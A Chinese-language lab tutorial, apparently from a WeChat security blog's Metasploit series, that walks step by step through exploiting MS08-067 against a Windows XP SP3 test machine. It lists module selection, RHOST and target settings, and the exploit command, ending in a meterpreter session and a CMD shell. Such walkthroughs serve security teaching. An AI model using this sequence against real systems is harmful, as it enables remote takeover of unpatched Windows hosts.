实验环境
-
Kali -
windows xp sp3
从结果中得到
Name :exploit/windows/smb/ms08_067_netapi
Disclosure Date:2008-10-28
Rank:great
Microsoft Server Service Relative Path Stack Corruption
2.使用use命令调用MS08067漏洞攻击程序
use exploit/windows/smb/ms08_067_netapi
3.使用show options 命令查看需要设置的选项
4.从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)使用 set 命令设置 Module Options,此处需要设置目标IP
set RHOST 192.168.20.16
5.使用 set 命令设置后,可再使用show options 命令查看设置情况
6.使用check命令检查漏洞是否存在
7.设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞因为实例演示的XP系统为WinXP SP3 简体中文版,即
8.使用set target 命令设置目标,此处即为set target 34
9.执行exploit命令后得到一个meterpreter
10.在meterpreter中输入shell即可进入CMD窗口
漏洞利用完成。
往期精选:
原文始发于微信公众号(长风实验室):MSF系列(五)| Metasploit漏洞攻击
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论